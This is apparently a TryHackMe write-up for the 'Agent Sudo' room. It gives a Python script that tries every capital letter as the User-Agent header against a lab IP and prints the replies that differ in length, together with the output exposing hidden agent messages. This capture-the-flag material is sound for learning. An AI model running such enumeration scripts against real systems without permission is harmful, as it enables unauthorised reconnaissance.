Agent Sudo — THM Scripts
2 min readAug 1, 2023
Title: Agent Sudo | Difficulty: Easy | Carlos Padilla
Discover Agent CODENAME
import requests, string
from datetime import datetime
class Exploit:
def __init__(self) -> None:
self.url = 'http://10.10.10.10:80/' # CHANGE THIS
self.responses = {}
print(f"\n[Info] Target: {self.url}")
print("[Info] Time | User-Agent | Status-Code | Content-Length\n")
nw=Exploit.retunTime();print(f"[Info] Started at {nw}")
self.abc = list(Exploit.returnStrings())
for letter in self.abc:self.sendRequest(letter)
print();self.showDifference()
def sendRequest(self, userAgent:str):
headers = {'user-agent': userAgent};nw=Exploit.retunTime()
response = requests.get(self.url, headers=headers, allow_redirects=True)
content_length = len(response.content.decode('utf-8'));self.responses[userAgent] = {'content': response.content.decode('utf-8'), 'content_length': content_length}
print(f"[Info] {nw} | UA: {userAgent} | SC: {response.status_code} | CL: {content_length}")
def showDifference(self):
unique_content_length = set([resp['content_length'] for resp in self.responses.values()])
if len(unique_content_length) > 1:
for userAgent, info in self.responses.items():
if list(map(lambda x: x['content_length'], self.responses.values())).count(info['content_length']) == 1:
print(f"--------------------\n[Info] Unique Content-Length found for User-Agent {userAgent} | CL: {info['content_length']} | Content:\n{info['content']}")
@staticmethod
def returnStrings():
return string.ascii_uppercase
@staticmethod
def retunTime():
return datetime.now().strftime("%Y-%m-%d %H:%M:%S")
if __name__ == '__main__':
Exploit()Output:
[Info] Target: http://IP:80/
[Info] Time | User-Agent | Status-Code | Content-Length
[Info] Started at 2023-08-01 12:37:51
[Info] 2023-08-01 12:37:51 | UA: A | SC: 200 | CL: 218
[Info] 2023-08-01 12:37:51 | UA: B | SC: 200 | CL: 218
[Info] 2023-08-01 12:37:51 | UA: C | SC: 200 | CL: 177
...
[Info] 2023-08-01 12:37:52 | UA: R | SC: 200 | CL: 310
...
--------------------
[Info] Unique Content-Length found for User-Agent C | CL: 177 | Content:
Attention chris, <br><br>
Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>
From,<br>
Agent R
--------------------
[Info] Unique Content-Length found for User-Agent R | CL: 310 | Content:
What are you doing! Are you one of the 25 employees? If not, I going to report this incident
<!DocType html>
<html>
<head>
<title>Annoucement</title>
</head>
<body>
<p>
Dear agents,
<br><br>
Use your own <b>codename</b> as user-agent to access the site.
<br><br>
From,<br>
Agent R
</p>
</body>
</html>